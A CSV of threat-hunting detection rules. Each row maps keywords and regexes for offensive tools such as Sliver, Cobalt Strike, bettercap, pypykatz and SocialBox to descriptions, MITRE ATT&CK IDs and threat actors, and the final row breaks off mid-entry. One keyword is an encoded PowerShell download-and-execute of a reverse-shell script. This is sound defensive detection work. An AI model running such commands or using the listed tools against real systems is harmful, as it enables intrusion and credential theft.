"*apt install crunch*",".{0,1000}apt\sinstall\scrunch.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*apt install dns2tcp*",".{0,1000}apt\sinstall\sdns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*apt install gpp-decrypt*",".{0,1000}apt\sinstall\sgpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*apt install hyperion*",".{0,1000}apt\sinstall\shyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*apt install polenum*",".{0,1000}apt\sinstall\spolenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*apt install seclists*",".{0,1000}apt\sinstall\sseclists.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*apt install set -y*",".{0,1000}apt\sinstall\sset\s\-y.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*apt install tor *",".{0,1000}apt\sinstall\stor\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*apt install wce*",".{0,1000}apt\sinstall\swce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*APT stands for Advanced Persistence Tomato*",".{0,1000}APT\sstands\sfor\sAdvanced\sPersistence\sTomato.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*apt* install john*",".{0,1000}apt.{0,1000}\sinstall\sjohn.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*apt/etumbot.py*",".{0,1000}apt\/etumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt/putterpanda.py*",".{0,1000}apt\/putterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt1_virtuallythere.profile*",".{0,1000}apt1_virtuallythere\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*APT64/EternalHushFramework*",".{0,1000}APT64\/EternalHushFramework.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*apt-get install *tor2web*",".{0,1000}apt\-get\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*apt-get install isc-dhcp-server net-tools*",".{0,1000}apt\-get\sinstall\sisc\-dhcp\-server\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*apt-get -y install tor *",".{0,1000}apt\-get\s\-y\sinstall\stor\s.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*APTortellini/unDefender*",".{0,1000}APTortellini\/unDefender.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*APTSimulator*",".{0,1000}APTSimulator.{0,1000}","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2374","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" "*apypykatz.py*",".{0,1000}apypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*",".{0,1000}aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*archerysec*",".{0,1000}archerysec.{0,1000}","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2196","497","2024-04-17T05:29:16Z","2017-12-04T12:42:54Z" "*archive-*.kali.org/*",".{0,1000}archive\-.{0,1000}\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*archive.torproject.org*",".{0,1000}archive\.torproject\.org.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*ArchStrike*",".{0,1000}ArchStrike.{0,1000}","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ares.py runserver*",".{0,1000}ares\.py\srunserver.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*ares-master.zip*",".{0,1000}ares\-master\.zip.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*Args_Invoke_Kerberoast*",".{0,1000}Args_Invoke_Kerberoast.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*armitage.exe*",".{0,1000}armitage\.exe.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*armory install *",".{0,1000}armory\sinstall\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install .net-execute*",".{0,1000}armory\sinstall\s\.net\-execute.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install .net-pivot*",".{0,1000}armory\sinstall\s\.net\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install .net-recon*",".{0,1000}armory\sinstall\s\.net\-recon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install situational-awareness*",".{0,1000}armory\sinstall\ssituational\-awareness.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install windows-bypass*",".{0,1000}armory\sinstall\swindows\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install windows-pivot*",".{0,1000}armory\sinstall\swindows\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Arno0x/DBC2*",".{0,1000}Arno0x\/DBC2.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Arno0x/EmbedInHTML*",".{0,1000}Arno0x\/EmbedInHTML.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*Arno0x/NtlmRelayToEWS*",".{0,1000}Arno0x\/NtlmRelayToEWS.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*Arno0x/WebDavC2*",".{0,1000}Arno0x\/WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*arp.spoof on*",".{0,1000}arp\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arp.spoof.*",".{0,1000}arp\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arp.spoof.targets*",".{0,1000}arp\.spoof\.targets.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arp_mitm.py*",".{0,1000}arp_mitm\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*arp_spoof.*",".{0,1000}arp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arpspoof -i *",".{0,1000}arpspoof\s\-i\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*ArpSpoofer*",".{0,1000}ArpSpoofer.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arpspoofing.py *",".{0,1000}arpspoofing\.py\s.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","0","N/A","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" "*Arsenal needs TIOCSTI enable for running*",".{0,1000}Arsenal\sneeds\sTIOCSTI\senable\sfor\srunning.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*arsenal v* - Pentest command launcher*",".{0,1000}arsenal\sv.{0,1000}\s\-\sPentest\scommand\slauncher.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*arsenal_kit.cna*",".{0,1000}arsenal_kit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.exe*",".{0,1000}artifact\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 